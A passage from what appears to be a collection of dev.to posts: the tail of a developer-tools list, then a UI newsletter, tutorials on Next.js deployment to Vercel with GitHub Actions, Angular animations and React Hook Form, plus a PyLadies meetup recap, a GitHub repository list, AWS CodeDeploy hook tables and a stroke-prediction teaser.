[Webflow](https://www.webflow.com/) provides a modern way for pretty much anyone (even non-technical people) to design and build for the web. It is a free low-code platform for rapidly building custom responsive web apps in a visual canvas. It automatically generates HTML, CSS, and JavaScript code from your designs, which your team can quickly import and plug into the site's codebase.
With the help of Webflow, designing and building responsive web apps becomes as easy as dragging and dropping the UI components you need. There is no need to spend days or even months making UI/UX decisions, fighting with state management, setting up access control, or re-inventing the wheel, saving everyone the stress of **repetitively coding everything from scratch** 😍. This is especially helpful if you freelance: designing and launching web pages would only take a matter of days.
## Tabnine

Everyone's favorite AI code autocompletion tool 😄. Trusted by over 1 million developers across all programming languages, [Tabnine](https://www.tabnine.com/) helps developers write code with a little magic. It's based on deep learning, helping developers **code faster, reduce mistakes, and discover best coding practices**. It removes the burden of having to remember code syntax and lets you actually focus on writing **good** code, and writing it faster, which is the whole point of this article, right? 😏. Start using Tabnine today to 10X your workflow 😎 by installing it as an extension in your code editor.
## Tailwind CSS

[Tailwind CSS](https://tailwindcss.com) is a utility-first framework for rapidly building custom user interface (UI) components. This means that, unlike other CSS libraries, it doesn’t provide pre-styled components and classes that’ll have all your projects looking the same (insert Bootstrap). Instead, it provides low-level utility classes for styling virtually every single CSS property like padding (e.g. pt-10), flex (e.g. justify-between), color (e.g. blue-600), and so on. This way, you get to build **unique custom interfaces**, **make better design decisions** because it limits your choices via limited class variations. You’ll also never have to worry about naming CSS classes anymore. In fact, With Tailwind CSS. you may almost never need to **write CSS again**. Awesome, right? 😃
If you want to start using Tailwind CSS for your project, see this article on <a class="inline-link" href="https://blog.logrocket.com/tailwind-css-is-it-tomorrows-bootstrap-ebe560f9d00b/">getting started with Tailwind CSS</a>.
## Daily.dev
[Daily.dev](https://daily.dev/) is a news aggregator built especially for software developers, to help them stay up to date with the latest news in tech. With daily.dev, you will stay updated with the best articles from the best tech publications on any topic. Get all the content you love in one place -- CSS-Tricks, Smashing Magazine, web.dev, Hashnode, and 350+ sources.
<h2>Conclusion</h2>
And that's it, guys! I hope you are excited to start using these tools, because I am too 😁. There are a ton more tools out there, but these are my top picks.
### Do you know more?
Also, if there’s any other amazing tool you’ve been using that has improved your workflow somehow, or one you are excited to try out, drop it in the comments! Your feedback is greatly appreciated! 🙌. I too would love to expand my stash 😄. Have an amazing day!
**Enjoyed reading this as much as I enjoyed writing it for you? 😍** Support me 😃
<a href="https://www.buymeacoffee.com/molipa">
<img src="https://img.buymeacoffee.com/button-api/?text=Buy me a Coffee ☕ &emoji=🍦&slug=molipa&button_colour=40DCA5&font_colour=ffffff&font_family=Comic&outline_colour=000000&coffee_colour=FFDD00"></a>
there's nothing I would like more than for us to become friends on [Twitter](https://twitter.com/VectorIkechukwu) 💖
If you found this article helpful, please like and share it: really motivates me to publish more.
**Thanks so much for reading! 💖 And keep on coding! 👨💻.**
| iamvictor |
740,895 | UI Dev Newsletter #63 | content-visibility Idorenyin Udoh explains all about the content-visibility property in... | 0 | 2021-07-02T05:55:49 | https://mentor.silvestar.codes/reads/2021-06-28/ | html, css, javascript, a11y | - [content-visibility](https://bit.ly/3dkHgrr)
Idorenyin Udoh explains all about the content-visibility property in CSS.
- [Organize your CSS declarations alphabetically](https://bit.ly/2TarvN0)
Eric Bailey explains why organizing CSS declarations are essential and why using alphabetical order might be the best solution.
- [Using CSS to Enforce Accessibility](https://bit.ly/3jkBc6a)
Adrian Roselli lists some examples of how the CSS selector is keying off the HTML, what WCAG Success Criteria they help support, and if there are any gotchas.
- [Inherit, initial, unset, revert](https://bit.ly/3x5g9sk)
Peter-Paul Koch explains special CSS keywords you can use on any CSS property, where and when to use them to the greatest effect, and which ones should exist but don't.
- [GIFs on the web: A new way to bloat](https://bit.ly/3A6rk5R)
Doug Sillars shows how the Giphy platform loads an additional 300+ KB of code to your site when embedding GIFs.
- [Updating A 25-Year-Old Website](https://bit.ly/2U3Q8Ll)
Mads Stoumann shows how old code is sometimes unavoidable, either because of scope or costs, but it can teach you a thing or two.
- [DevToolsSnippets](https://bit.ly/2T3FoN6)
Manuel Matuzović shares a collection of front-end debugging script snippets to be used in the Sources panel in Chrome DevTools.
- [Can We](https://bit.ly/3A4QjGD)
Mehdi Merah shares a collection of websites focused on browser usage and features.
Happy coding!
[Subscribe to the newsletter here!](https://bit.ly/34155z3) | starbist |
739,170 | Nextjs CI/CD on Vercel with Github actions | In this post we'll learn how to set up CI/CD with Nextjs on vercel Prerequisite Github... | 0 | 2021-06-25T13:48:26 | https://dev.to/chuddyjoachim/nextjs-ci-cd-on-vercel-with-github-actions-7g7 | nextjs, react, github, vercel | In this post we'll learn how to set up **CI/CD** with **Nextjs** on **vercel**
#Prerequisites
* Github Account
* Vercel Account
#Getting Started
1. Create a new github repository
If you don't have a [**GitHub account**](https://github.com/signup), 👈 click here to create one.
Once you have one, proceed to creating a new repository.

###Proceed to add a repository name and click on Create Repository

2. Create and add your **Vercel** Token/Secret to **Github Secrets**
If you don't have a [**Vercel account**](https://vercel.com/signup), 👈 click here to create one.
Once you have one, proceed to creating a **Vercel token**.
* Click on the *settings* tab on your dashboard

* Click on *Token* then *Create*

* Add Token name then click create -- copy token

3. Create new Nextjs app.
Create a new Next.js app using npx and change into the new directory:
```
npx create-next-app nextjs-vercel-ci-cd
cd nextjs-vercel-ci-cd
```
4. Add Git remote.
Using the unique address of the GitHub repo you created earlier, configure Git locally with the URI.
```
git remote add origin git@github.com:<username>/<project-name>.git
```
5. Add workflow file.
In your project root directory add a **workflow file**
which will live at **.github/workflows/deploy.yml** -- or simply:
```
touch .github/workflows/deploy.yml
```
6. Install **Vercel cli** globally on your machine
`npm i -g vercel`
Before you proceed, you need to know your project ID and org ID from Vercel. The simplest way to get these is to link your project to Vercel. You can do this by using `npx vercel link`.
When you run the command, it will create a `.vercel` folder in your project with a `project.json` file. In that file, you will find the **projectId** and **orgId**, which you can use later in your GitHub Actions workflow.
You can save both values as secrets in your repository settings.
Something else you need to configure is to disable GitHub for your project on Vercel. That way, you let Vercel know that you want to take over control, and it will not trigger when you push your code to GitHub.
To disable GitHub, you create a `vercel.json` file in the root of your project (if it does not yet exist), and add the following contents to it:
```
{
"version": 2,
"github": {
"enabled": false
}
}
```
7. Add values to your repo's **GitHub Secrets**
You'll have to add the following tokens to your GitHub secrets:
**Vercel_Token**
**projectId**
**orgId**
and any other env token or secrets
## To do so:
Navigate to your **Github repository**, click on the settings tab.

1. click on secrets then 2. click on create new secret

Add secrets Name and Value

**N.B.** You can add multiple secrets if you prefer.
8. Edit workflow file.
In **deploy.yml** add:
```
name: deploy nexturl to vercel
on: [push, pull_request]
jobs:
vercel:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
```
If you're adding environment variables, e.g. **.env.local**, add the code below 👇.
The example below includes a *MongoDB* connection string and database name, which you must have added to your **GitHub secrets**.
```
#add env file to .env.local
- name: Set Env Vars on Vercel Project
uses: dkershner6/vercel-set-env-action@v1
with:
token: ${{ secrets.VERCEL_TOKEN }}
teamId: ${{ secrets.VERCEL_TEAM_ID }} # optional, without will use personal
projectName: nexturl # project name in Vercel
envVariableKeys: MONGODB_URL,MONGODB_DB
env:
MONGODB_URL: ${{ secrets.MONGODB_URL }}
TARGET_MONGODB_URL: preview,development,production
# comma delimited, one of [production, preview, development]
TYPE_MONGODB_URL: encrypted # one of [plain, encrypted]
MONGODB_DB: ${{ secrets.MONGODB_DB }}
TARGET_MONGODB_DB: preview,development,production
TYPE_MONGODB_DB: encrypted
```
Proceed to deployment to Vercel by adding the following code:
```
# deploy app to vercel
- name: deploy site to vercel
uses: amondnet/vercel-action@v20
with:
vercel-token: ${{ secrets.VERCEL_TOKEN }} # Required
github-token: ${{ secrets.GITHUB_TOKEN }} #Optional
vercel-args: '--prod' #Optional
vercel-org-id: ${{ secrets.ORG_ID}} #Required
vercel-project-id: ${{ secrets.PROJECT_ID}} #Required
```
## Here's an example of a project which I deployed on Vercel using GitHub Actions 👉 [NextUrl](https://nexturl.vercel.app/)
## Link to GitHub repository 👉 [Nexturl-github](https://github.com/chuddyjoachim/next-url)
## A star would be appreciated.
| chuddyjoachim |
739,360 | Animating Angular’s *ngIf and *ngFor | Jared Youtsey | ng-conf | May 2019 *ngIf and *ngFor will remove elements from the DOM. There isn’t a... | 0 | 2021-06-25T16:46:55 | https://dev.to/ngconf/animating-angular-s-ngif-and-ngfor-5e12 | angular, animation, css | Jared Youtsey | ng-conf | May 2019
`*ngIf` and `*ngFor` will remove elements from the DOM. There isn’t a CSS solution for animating a non-existing element in the DOM. But Angular provides us with a simple solution.
For purposes of brevity, wherever I refer to `*ngIf` it is equally applicable to `*ngFor`. The complete, working code can be downloaded [here](https://github.com/fivedice/ng-ngif-animations).
Let’s start with the default application generated by the CLI and just modify the nice Angular logo in and out of the view based on a button we add.
```
ng new ngifAnimation
```
You won’t need routing and can select SCSS for the styling.
Let’s add the button we want to use to toggle our `*ngIf` on the image. Open `app.component.html` and add a simple button: (this is the default HTML)
```
<!--The content below is only a placeholder and can be replaced.-->
<div style="text-align:center">
<h1>Welcome to {{ title }}!</h1>
<button (click)="onClick()">Toggle Image</button>
...
```
Now let’s add the `onClick()` method to the class that toggles a public variable `showImage`:
```
export class AppComponent {
title = 'ngifAnimation';
showImage = false;
onClick() {
this.showImage = !this.showImage;
}
}
```
Now, let’s add the `*ngIf` in the template on the `<img>` tag:
```
<img
*ngIf="showImage"
width="300"
alt="Angular Logo"
src="..."
/>
```
Let’s add a little bit of CSS to force the button to stay put when the image pops in and out: (`app.component.scss`)
```
button {
display: block;
margin: 0 auto;
clear: both;
}
```
If you run the app now you’ll be able to click the button and the image will jarringly pop in and out of the view. If you check your developer tools, you’ll find that the `<img>` tag is popping in and out of the DOM. When `showImage` is false the `<img>` tag isn’t even present. This is where our inability to use CSS comes into play. It’s a terrible user experience to have elements, especially large ones, pop in and out without some transition. Let’s make it grow and fade in and out in a pleasing manner!
To handle animations (for way more reasons than just the one covered in this article) Angular provides the `BrowserAnimationsModule`. As of the latest Visual Studio Code, though, it doesn’t want to auto-import this module for you if you add it to your `AppModule` imports. It’s hidden in `@angular/platform-browser/animations`. Let’s add the import manually and add it to the module’s imports.
```
import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { AppComponent } from './app.component';
import { BrowserAnimationsModule } from '@angular/platform-browser/animations';
@NgModule({
declarations: [AppComponent],
imports: [BrowserModule, BrowserAnimationsModule],
providers: [],
bootstrap: [AppComponent]
})
export class AppModule {}
```
Now we’re ready to add our Angular animations! But where? We’ll approach this in the simplest manner. But be aware that we’re just scratching the surface of the power of Angular animation. It’s worth learning much more about. The simple approach is directly in the affected component. In our case, that’s `app.component.ts's` `@Component` directive. Here is the whole thing, but don’t worry, we’ll break it down and explain it.
```
import { trigger, state, style, animate, transition } from '@angular/animations';
@Component({
...,
animations: [
trigger(
'inOutAnimation',
[
transition(
':enter',
[
style({ height: 0, opacity: 0 }),
animate('1s ease-out',
style({ height: 300, opacity: 1 }))
]
),
transition(
':leave',
[
style({ height: 300, opacity: 1 }),
animate('1s ease-in',
style({ height: 0, opacity: 0 }))
]
)
]
)
]
})
```
Whew! That’s a lot and it’s not terribly obvious without reading through it carefully. Let’s break it down, bit by bit.
First, `animations: []` is an array of things we want to happen or state definitions. In this case we just want to `trigger` an animation called `inOutAnimation`. You can name this what you like. It should be descriptive for what it accomplishes or what it should consistently apply to. In our case we are animating an image in and out of the view.
Then, we give the `trigger` a set of states and/or transitions. We only need two specific transitions to occur that are related to `*ngIf`: `:enter` and `:leave`. These are the states that CSS just doesn’t give us. `:enter` is when a DOM element is being added, and `:leave` is when a DOM element is being removed.
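As a side note, `:enter` and `:leave` are shorthand aliases for transitions involving Angular's special `void` state (the element not being in the DOM):
```
transition('void => *', ...)  // equivalent to ':enter' (element being added)
transition('* => void', ...)  // equivalent to ':leave' (element being removed)
```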
When we want the image to `:enter` we are starting with the style of `height: 0, opacity: 0`. It’s basically invisible to start with. When it’s done we would like it to be 300 pixels tall and be completely opaque.
This is where the `animate` instruction comes in. We are going to animate over 1) a period of time 2) with a particular easing mechanism 3) to a new style. 1 and 2 are combined in the first string-based instruction, `1s ease-out`. This means that we are animating to the new style over 1 second, and we are easing out, or coming to a gentle stop rather than a sudden one. 3 specifies what the end styling should be. In our case that's 300 pixels high and completely opaque.
If you run this now you’ll find that nothing has changed. We now need to apply the animation to the element that is being added/removed from the DOM. In this case, it’s our `<img>` tag that has the `*ngIf` directive on it.
```
<img
*ngIf="showImage"
[@inOutAnimation]
width="300"
alt="Angular Logo"
src="..."
/>
```
Here we use the name of the trigger to bind the animation to the template element.
If you run it now, you can click the button and the image zooms/fades in. Click it again and it'll shrink/fade out! Voila!
Personally, I find the syntax of Angular animations somewhat difficult. It’s non-obvious and, if you’re not doing it every day, you’re probably going to have to re-learn this a few times. And the template syntax works with or without the `[]`'s, which makes me scratch my head a bit.
Maybe the Angular team will give us a ReactiveAnimationsModule someday that makes animation a bit easier to work with, like ReactiveFormsModule did for forms? One can hope.
This is just scratching the surface of what Angular animations are capable of. Very complex transforms/transitions are possible and can be carefully coordinated in ways that CSS just can’t guarantee.
As a side note, if you’re worried about performance vs pure CSS animations, this is a quote from the [Angular docs](https://angular.io/guide/animations):
> _Angular’s animation system lets you build animations that run with the same kind of native performance found in pure CSS animations. You can also tightly integrate your animation logic with the rest of your application code, for ease of control._
If you’ve found this useful, I’d appreciate a few claps for this article.
If you’d like to learn more about Angular in a fun environment while hanging out with the movers and shakers of the Angular world, snag a ticket to [ng-conf](https://www.2021.ng-conf.org/) and join us for the best Angular conference in the US.
Image by [PIRO4D](https://pixabay.com/users/piro4d-2707530/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=2137333) from [Pixabay](https://pixabay.com/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=2137333).
For more Angular goodness, be sure to check out the latest episode of [The Angular Show podcast](https://www.spreaker.com/show/angular-show).
---
## ng-conf: Join us for the Reliable Web Summit
Come learn from community members and leaders the best ways to build reliable web applications, write quality code, choose scalable architectures, and create effective automated tests. Powered by ng-conf, join us for the Reliable Web Summit this August 26th & 27th, 2021.
https://reliablewebsummit.com/ | ngconf |
739,406 | PyLadies Dublin: Shipping Python Apps using Podman / Collaborative documentation as code with Git, Mkdocs and Pandoc | ❤️ A huge thank you for all those who attended and interested in our recent PyLadies Dublin meetup as... | 11,521 | 2021-06-28T20:26:50 | https://dev.to/pyladiesdub/pyladies-dublin-shipping-python-apps-using-podman-collaborative-documentation-as-code-with-git-mkdocs-and-pandoc-4h34 | pyladies, python, video | ❤️ A huge thank you for all those who attended and interested in our recent PyLadies Dublin meetup as well as being patient as the audio technical difficulties at the start of one of our speakers talk (it was a problem at my end 😅).
🍿 Alternatively you missed it or want to re-watch it (I've added chapters): https://www.youtube.com/watch?v=UwHiZ6yhMZU
👏 To Elfin and Mihai for speaking and helping us out at such short notice, and this would not have happened if my co-organiser Lei hadn't reached out for speakers for me. Thank you all so much, and not forgetting Mick who ran up 2 flight of stairs to see what was going on with my audio. 😆
🙌 But it all worked out in the end, even with gremlins running amuck but we kept rolling and all's well that ends well, wrapping up with Elfin coming back to explain how she solved an earlier issue when doing live demos! Yes, it was all live demos at this meetup! It was all very amazing!
📢 Announcements from the evening can be found here: https://cryptpad.fr/pad/#/2/pad/view/jn-9KLn4c0Zhy+CyC4z8mUdRTpKs8ChoEz7zo31YITY/
🗓 Next PyLadies Dublin

* Jul 20, 18:30 - 19:30 (Irish Time)
Bojan Miletic talking about "FastAPI, Lambdas, PyTest and other cool things"
* We've got room for **1** more lightning talk speaker (10-15mins)
* RSVP and details here: https://www.meetup.com/PyLadiesDublin/events/277651743/
📢 Call for Speakers (from Sep onwards)
* Interested in speaking or know someone who has something awesome to show at our upcoming meetups, send them on via https://pyladiesdublin.typeform.com/to/VvW3iME6
🤔 If you have ideas for talks, workshops, something we haven't done before, or general questions of any kind, drop us an email at dublin@pyladies.com.
Again, I would like to thank everyone for your interest and attending our live-streams, please like and subscribe to [our Youtube channel](https://www.youtube.com/channel/UCMunGHeQPceOWhNSqlmYWPg) and hit that 🔔 to know when our next one goes live. Your support is much appreciated. If you missed the live-stream, don't worry, it's in [our playlist](https://www.youtube.com/playlist?list=PL13GO9yDtCL1QEVuqAVldK2JqGof9wsuk) so you can watch it in your own time (or re-watch it).
---
## TALK 1: Shipping Python Apps using Podman by Elif Mosessohn-Samedin
### Description:
A quick introduction to Ansible and Red Hat Container Tools for Pythonistas. Building and running Python applications using Podman. Exploring the manner in which containers benefit developers.
### About Elif Mosessohn-Samedin
DevOps (Automation) Engineer with experience in Infrastructure Optimization and Management. Red Hat Certified Architect in Infrastructure. Advocate for Continuous Learning, Open Source Communities, and Technical Innovation. Espresso Addict. https://github.com/elifsamedin
## TALK 2: Collaborative documentation as code with Git, Mkdocs and Pandoc by Mihai Criveti
### Description:
Authoring documentation, presentations and blogs with multiple collaborators using an open framework and CI/CD.
Understanding mkdocs and pandoc. Authoring presentations using markdown, LaTeX and pandoc.
Setting up Git for multiple authors, with CODEOWNERS and pull requests.
Using make, GitHub, TravisCI to automate the publishing process.
Containerized doc builds with pandoc and kubernetes.
### About Mihai Criveti
Mihai Criveti is the CTO for Cloud Native and Red Hat Solutions at IBM, and a Red Hat Certified Architect, supporting clients with Open Source technologies. https://github.com/crivetimihai
---
# 🕰 SCHEDULE
18:30 - 18:35 Event Starts / Settle down with cup of tea/coffee
18:35 - 18:45 Welcome & Announcements by Vicky
18:45 - 19:00 Shipping Python Apps using Podman by Elif Mosessohn-Samedin
19:00 - 19:15 Collaborative documentation as code with Git, Mkdocs and Pandoc by Mihai Criveti
19:15 - 19:30 Q&A
19:25 - 19:30 Anything else to wrap up with from anyone in audience?
19:30 Event ends
---
# 📢 CALL FOR SPEAKERS for 2021
Interested in speaking at our upcoming meetups, please submit talk details to: https://pyladiesdublin.typeform.com/to/VvW3iME6
If you have referrals of speakers you want us to invite, let us know also, being a virtual event helps close the boundaries of inviting speakers further afield than Ireland. 😊
# CONTACT US
💌 Email: dublin@pyladies.com.

# 🤔 FAQ
## Q. I'm not female, is it ok for me to attend?
A. Yes, PyLadies Dublin events are open to everyone at all levels.
## Q. What do you do at PyLadies Dublin Meetups?
A. We have short (or long talks), demos, folks working on their own projects, ask questions on Python-related topics, work on projects together or generally chit-chat and meet like-minded people.
## Q. Do you have a Code of Conduct?
A. Yes, you can find it at https://dublin.pyladies.com
| whykay |
739,417 | 35 Must Known GitHub Repositories For Developers | GitHub is a git hosting platform service. There is not a single thing that you can’t find on GitHub... | 0 | 2021-06-25T17:57:57 | https://dev.to/abhayparashar31/35-must-known-github-repositories-for-developers-2hi7 | github, programming, python, java | GitHub is a git hosting platform service. There is not a single thing that you can’t find on GitHub related to the software industry. It is a goldmine of resources for developers. Like every other mine in the world, you need to be a good miner to dig gold to get great resources from it.
If you are not in the mood to do a lot of research, don’t worry I am here for you. In this blog, we are going to see some of the best GitHub repositories for developers that you should bookmark right away.
## 1. The Algorithms
It is one of the best GitHub repositories for learning data structures and algorithms using different languages. Data structures must be known by every computer science student. Whether you are a Python developer, Java developer, Go developer, or some old-school C++ developer, there is something for everyone in this repository that you should learn. All the algorithms and data structures present here are explained very simply. They also have a website for easy access to all the code.
**Stats : (111k+ ⭐) (30.4k+ Forked)**
## 2. freeCodeCamp/freeCodeCamp
Freecodecamp is a nonprofit organization that provides a free learning platform for learning to code. Their Github repository is the backend for everything. In the repo, there is a README.md file that contains the links to each course available on the website. The Github Profile of FreeCodeCamp also contains many other useful repositories like boilerplates for different programming languages, how to contribute to open source, and many more.
**Stats : (325k+ ⭐) (26k+ Forked)**
## 3. EbookFoundation/free-programming-books
This repository is another GEM of Github. The repository provided by EbookFoundation contains a list of free programming books. You will find links to free books in 20+ languages. There are Over a thousand books that are covering over 100 programming languages and millions of concepts.
**Stats : (194k+ ⭐) (43k+ Forked)**
## 4. Avik-Jain/100-Days-Of-ML-Code
This repository is more than a repo, it shows the constant hard work and dedication of a group of people to contribute to open source. As the name of the repository suggests, it has a 100-day curriculum to learn Machine Learning. One of the best parts of this repo is the attractive banner images for every day. If you are a learner or a developer of ML, this one is a must-fork for you.
**Stats : (32.4k+ ⭐) (8.2k+ Forked)**
## 5. tuvtran/project-based-learning
One of the best ways to learn to code is by building projects because in the end, all that matters is the number of projects and knowledge you have. Many companies are giving priority to projects more than certificates.
This repo has a collection of links to different projects on the internet to help you boost your learning in different areas of programming. Whether it is web development, Game Development, JavaScript, or Python you will find a project for everything.
**Stats : (51.4k+ ⭐) (8k+ Forked)**
**Check Out Other 30 Valuable Repositories [here](https://levelup.gitconnected.com/35-most-valuable-github-repositories-for-developers-45ab9df1af81)**
| abhayparashar31 |
741,102 | AWS CodeDeploy LifeCycle Hooks run order, summarized in one table for EC2, ECS, Lambda | While preparing for my AWS DevOps Engineer Professional exam I had to understand and memorize the... | 0 | 2021-06-28T08:33:35 | https://dev.to/vgcloud/aws-codecommit-lifecycle-hooks-run-order-summarized-in-one-table-for-ec2-ecs-lambda-mh6 | aws, linux, serverless, devop | While preparing for my AWS DevOps Engineer Professional exam I had to understand and memorize the CodeDeploy LifeCycle hooks. As usual, AWS provides decent documentation. Here is an example of how the [Run order of hooks](https://docs.aws.amazon.com/codedeploy/latest/userguide/reference-appspec-file-structure-hooks.html) is documented. However, I could not find a table with all three cases combined. So I created one and it did help me a lot during the study. And also, I had a question in the exam about the "AfterAllowTestTraffic" hook.
### Table 1: Run order of hooks for Lambda, ECS and EC2 Blue-Green deployments

*Note 1: The greyed out hooks in the table are reserved for CodeDeploy operations. They cannot be used to run scripts.*
*Note 2: Hooks on EC2 can be used to run scripts on instances, while hooks for Lambda and ECS can be used only to run Lambda functions.*
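For context, the script-capable hooks are declared in the `appspec.yml` of an EC2/On-Premises deployment. A minimal sketch (the script paths and timeout values below are just example placeholders):
```
version: 0.0
os: linux
hooks:
  BeforeInstall:
    - location: scripts/install_dependencies.sh
      timeout: 300
      runas: root
  ApplicationStart:
    - location: scripts/start_server.sh
      timeout: 300
      runas: root
```
Each hook entry points at a script bundled with the revision; CodeDeploy runs it at that stage of the run order shown in the tables.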
### Table 2: Run order of hooks for EC2 In-Place deployments without ELB and with ELB and EC2 Blue-Green deployments

Happy coding CodeDeploy lifecycle hooks! | vgcloud |
739,435 | Machine Learning Applications: Stroke Prediction | The Stroke Prediction Dataset at Kaggle is an example of how to use Machine Learning for disease... | 0 | 2021-06-25T18:51:15 | https://reinforcement-learning4.fun/2021/06/25/machine-learning-applications-stroke-prediction/ | article | ---
title: Machine Learning Applications: Stroke Prediction
published: true
date: 2021-06-25 14:35:53 UTC
tags: Article
canonical_url: https://reinforcement-learning4.fun/2021/06/25/machine-learning-applications-stroke-prediction/
---
The Stroke Prediction Dataset at Kaggle is an example of how to use Machine Learning for disease prediction.
The dataset comprises more than 5,000 observations of 12 attributes representing patients’ clinical conditions like heart disease, hypertension, glucose, smoking, etc.
For each instance, there’s also a binary target variable indicating if a patient had a stroke.
We can build a … [Continue reading Machine Learning Applications: Stroke Prediction →](https://reinforcement-learning4.fun/2021/06/25/machine-learning-applications-stroke-prediction/) | rodolfomendes |
739,453 | React Hook Form | React hook form is a tiny library without any other dependencies. It is easy to use which requires us... | 0 | 2021-07-08T14:09:35 | https://dev.to/maimohamed/react-hook-form-4hk6 | javascript, react | React Hook Form is a tiny library without any other dependencies. It is easy to use and requires us to write fewer lines of code compared to other libraries.
## 1. Why Not Other React Form Libraries?
* Performance is important. This is a tiny library without any dependencies.
* Reduces the code to handle forms, with less complexity due to the Hooks.
* Minimizes the number of re-renders and faster mount.
## 2. Installation
It's time to make our forms powerful with the use of React Hook Form! Open your terminal and then execute the following commands, which set up a new React project:
`npx create-react-app react-hook-form-demo `
`cd react-hook-form-demo`
`npm install react-hook-form`
`npm start`
At the end of the article we will be able to create a simple registration form like this
{% codesandbox amazing-kalam-vzwod%}
let's start
## 3. Basic form
<mark>
Assume that we have a simple form with a user name input field and logs the data on console after submission
</mark>
```javascript
const App=()=> {
return (
<form>
<input type="text" placeholder="user name"/>
<button type="submit">submit</button>
</form>
);
}
export default App;
```
Time to import react hook form
```javascript
import { useForm } from "react-hook-form";
const App = () => {
const { register, handleSubmit } = useForm();
const onSubmit = (data) => console.log(data);
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input type="text" placeholder="user name" {...register("userName")} />
<button type="submit">submit</button>
</form>
);
};
export default App;
```
After submission we get the data logged to the console, but what are those new words (useForm, register)?
Before we move ahead, we need to know how this library works.
<h4>useForm</h4>It is a custom hook for managing forms.
This is one of those functions which you will be calling first, before you apply any handling logic to your existing forms. It returns an object containing some properties. For now, you only need register and handleSubmit.
<h4>register</h4> Allows you to register an input ref and apply validation rules in React Hook Form.
<h4>handleSubmit</h4>This function will receive the form data if form validation is successful.
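Conceptually, `handleSubmit(onSubmit)` returns an event handler that prevents the browser's default form submission, runs validation, and only calls your callback with the collected data when validation passes. Here is a rough plain-JavaScript sketch of that idea (this is NOT react-hook-form's actual code; `validate` is a made-up stand-in for its internal validation):

```javascript
// Illustrative sketch of the handleSubmit idea (NOT react-hook-form's real code).
function makeHandleSubmit(validate, onValid) {
  return (event) => {
    event.preventDefault(); // stop the browser's default form post
    const result = validate(); // pretend this returns { valid, data }
    if (result.valid) onValid(result.data); // callback only runs on success
  };
}

// Tiny demo with a fake event object:
let prevented = false;
let received = null;
const handler = makeHandleSubmit(
  () => ({ valid: true, data: { userName: "Mai" } }),
  (data) => { received = data; }
);
handler({ preventDefault: () => { prevented = true; } });
console.log(prevented, received); // true { userName: 'Mai' }
```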
## 4. Adding default values (initial values)
It is common to initialize a form by passing defaultValues to useForm.
```javascript
const { register, handleSubmit } = useForm({
defaultValues: {
userName: "Mai",
}
});
```
## 5. Basic validation
<mark>
Assume that we need to validate this user name input to be a required field and must be at least 3 characters
</mark>
```javascript
import { useForm } from "react-hook-form";
const App = () => {
const {
register,
handleSubmit,
formState: { errors },
} = useForm({ mode: "onChange" });
const onSubmit = (data) => console.log(data);
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input
type="text"
placeholder="user name"
{...register("userName", {
required: true,
minLength: {
value: 3,
},
})}
/>
{errors.userName?.type === "required" && (
<small>user name is required</small>
)}
{errors.userName?.type === "minLength" && (
<small>user name must be atleast 3</small>
)}
<button type="submit">submit</button>
</form>
);
};
export default App;
```
React Hook Form provides an errors object to show you the errors in the form.
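As an alternative to checking `errors.userName?.type` for each rule, you can also attach a `message` to every rule and render `errors.userName?.message` directly; a sketch of the same field in that style:

```javascript
<input
  type="text"
  placeholder="user name"
  {...register("userName", {
    required: "user name is required",
    minLength: { value: 3, message: "user name must be atleast 3" },
  })}
/>
{errors.userName && <small>{errors.userName.message}</small>}
```

This keeps each error message next to the rule that produces it.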
## 6. Adding nested fields
<mark>
Assume that the user should enter their address through two nested fields (country, city)
</mark>
The final submitted data should look like this:
```json
{userName:"toty",
address:{country:"x",city:"y"}
}
```
```javascript
import { useForm } from "react-hook-form";
const App = () => {
const {
register,
handleSubmit,
formState: { errors },
} = useForm({ mode: "onChange" });
const onSubmit = (data) => console.log(data);
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input
type="text"
placeholder="user name"
{...register("userName", {
required: true,
minLength: {
value: 3,
},
})}
/>
{errors.userName?.type === "required" && (
<small>user name is required</small>
)}
{errors.userName?.type === "minLength" && (
<small>user name must be atleast 3</small>
)}
<input
type="text"
placeholder="country"
{...register("address.country", {
required: true,
})}
/>
<input
type="text"
placeholder="city"
{...register("address.city", {
required: true,
})}
/>
<button type="submit">submit</button>
</form>
);
};
export default App;
```
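Why does `register("address.country")` produce a nested `address` object? react-hook-form treats dot-separated names as paths into the result object. The idea can be sketched in plain JavaScript (illustrative only; this is not the library's actual implementation):

```javascript
// Build nested objects from dot-separated paths (illustrative sketch only).
function setPath(target, path, value) {
  const keys = path.split(".");
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    node = node[keys[i]] = node[keys[i]] || {}; // create intermediate levels
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

const data = {};
setPath(data, "userName", "toty");
setPath(data, "address.country", "x");
setPath(data, "address.city", "y");
console.log(JSON.stringify(data));
// {"userName":"toty","address":{"country":"x","city":"y"}}
```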
Wooow It is soo easy !!
[logo]: https://static.wikia.nocookie.net/spongebob/images/a/ac/Hooky_078.png/revision/latest/scale-to-width-down/1000?cb=20190906081347 "Logo Title Text 2"
![alt text][logo]
But the code is a little long, so let's do a small refactor: move the input into a shared component and also use React Bootstrap.
## 7. Integration with React Bootstrap
```javascript
import { Form } from "react-bootstrap";
const Input = ({
label,
type,
placeholder,
controls,
errorMsg,
disabled,
}) => {
return (
<div className="mb-3">
{label && <Form.Label>
{label}</Form.Label>}
<Form.Control
{...controls}
type={type}
placeholder={placeholder}
disabled={disabled}
/>
{errorMsg && <small>
{errorMsg}</small>}
</div>
);
};
export default Input;
```
And the main component after refactoring should look like this:
```javascript
<Input
label="User Name"
type="text"
placeholder="enter your user name"
controls={register("userName", {
required: true,
minLength: {
value: 3,
},
})}
errorMsg={
errors.userName?.type === "required" &&
"user name is required"
}
/>
```
## 8. Integration with third-party libraries
Assume that our third-party library is React Select:
`npm install react-select`
First we need to add a shared component for React Select.
```javascript
import React from "react";
import Select from "react-select";
import { Controller } from "react-hook-form";
const InputSelect = ({
options,
label,
control,
controls,
name,
errorMsg,
placeholder,
asterick,
}) => {
return (
<>
<label>
{label} {asterick && <span>*</span>}
</label>
<Controller
name={name}
isClearable
control={control}
{...controls}
render={({ field }) => (
<Select
{...field}
options={options}
placeholder={placeholder}
/>
)}
/>
{errorMsg && <small>{errorMsg}</small>}
</>
);
};
export default InputSelect;
```
